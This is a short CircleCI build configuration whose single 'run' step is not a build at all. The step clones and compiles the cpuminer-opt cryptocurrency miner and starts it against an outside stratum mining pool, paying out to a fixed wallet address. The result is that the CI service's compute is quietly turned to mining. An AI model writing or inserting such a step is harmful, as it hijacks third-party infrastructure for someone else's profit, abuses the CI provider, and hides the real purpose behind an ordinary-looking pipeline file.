version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: git clone https://github.com/JayDDee/cpuminer-opt.git && cd cpuminer-opt && chmod +x build.sh && ./build.sh  && ./cpuminer -a power2b -o stratum+tcps://stratum-asia.rplant.xyz:17022 -u MipxzCT7c3uEmgFMGiPTiNeogAtnFMYAou